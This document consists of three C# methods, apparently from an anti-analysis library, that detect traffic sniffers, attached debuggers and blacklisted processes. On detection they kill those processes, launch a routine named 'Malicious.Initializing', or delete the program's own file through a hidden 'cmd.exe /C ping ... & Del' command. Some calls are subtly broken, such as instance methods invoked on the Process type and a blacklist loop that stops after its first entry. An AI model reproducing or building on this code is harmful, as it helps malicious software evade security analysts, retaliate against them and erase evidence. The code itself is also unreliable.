/// <summary> /// Check for sniffers /// </summary> public static void Parse(Process CurrentProcess) { try { ServicePointManager.CheckCertificateRevocationList = true; HttpWebRequest request = WebRequest.Create("https://google.com") as HttpWebRequest; request.Timeout = 10000; request.ContinueTimeout = 10000; request.ReadWriteTimeout = 10000; request.KeepAlive = true; request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"; request.Host = "www.google.com"; request.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"; request.Method = "GET"; request.ServerCertificateValidationCallback = ValidationCallback; using (HttpWebResponse response = request.GetResponse() as HttpWebResponse) { if (response.StatusCode == HttpStatusCode.OK) { response.Close(); } else { response.Close(); if (ShowAlert) { Alert.Show(AlertMessage); } if (SelfDelete) { string location = CurrentProcess.MainModule.FileName; Process.Start(new ProcessStartInfo("cmd.exe", "/C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"" + location + "\"") { WindowStyle = ProcessWindowStyle.Hidden }).Dispose(); CurrentProcess.Kill(); Environment.Exit(0); } CurrentProcess.Kill(); } } } catch { if (ShowAlert) { Alert.Show(AlertMessage); } if (SelfDelete) { string location = CurrentProcess.MainModule.FileName; Process.Start(new ProcessStartInfo("cmd.exe", "/C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"" + location + "\"") { WindowStyle = ProcessWindowStyle.Hidden }).Dispose(); CurrentProcess.Kill(); Environment.Exit(0); } CurrentProcess.Kill(); } }
/// <summary> /// Start the anti debugger service /// </summary> public static async void Start(Process CurrentProcess) { for (; ;) { CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent); if (isDebuggerPresent) { if (ShowAlert) { Alert.Show(AlertMessage); } if (Aggressive) { new Thread(new ThreadStart(Malicious.Initializing)) { IsBackground = true }.Start(); return; } if (!Aggressive) { Process.GetCurrentProcess().Kill(); } } if (Debugger.IsAttached || Debugger.IsLogging()) { if (ShowAlert) { Alert.Show(AlertMessage); } if (Aggressive) { new Thread(new ThreadStart(Malicious.Initializing)) { IsBackground = true }.Start(); return; } else if (SelfDelete) { string location = CurrentProcess.MainModule.FileName; Process.Start(new ProcessStartInfo("cmd.exe", "/C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"" + location + "\"") { WindowStyle = ProcessWindowStyle.Hidden }).Dispose(); CurrentProcess.Kill(); Environment.Exit(0); } if (!Aggressive) { Process.GetCurrentProcess().Kill(); } } await Task.Delay(200); if (!KeepAlive) { break; } } }
private static async void ScanProcess() { for (;;) { Processes = null; Processes = Process.GetProcesses(); foreach (Process process in Processes) { Detected = false; WhiteListed = false; foreach (var nameWhite in WhiteList) { if (IgnoreCase) { WhiteListed = (process.MainWindowTitle.ToLower().Contains(nameWhite) || process.ProcessName.ToLower().Contains(nameWhite)); if (WhiteListed) { break; } } else { WhiteListed = (process.MainWindowTitle.Contains(nameWhite) || process.ProcessName.Contains(nameWhite)); if (WhiteListed) { break; } } } if (WhiteListed) { continue; } foreach (string nameBlack in BlackList) { if (IgnoreCase) { Detected = (process.MainWindowTitle.ToLower().Contains(nameBlack) || process.ProcessName.ToLower().Contains(nameBlack)); break; } else { Detected = (process.MainWindowTitle.Contains(nameBlack) || process.ProcessName.Contains(nameBlack)); break; } } if (Detected) { process.Kill(); if (ShowAlert) { Alert.Show(AlertMessage); } if (SelfDelete) { string location = Process.MainModule.FileName; Process.Start(new ProcessStartInfo("cmd.exe", "/C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"" + location + "\"") { WindowStyle = ProcessWindowStyle.Hidden }).Dispose(); Process.Kill(); Environment.Exit(0); } Process.Kill(); } } await Task.Delay(500); if (!KeepAlive) { break; } } }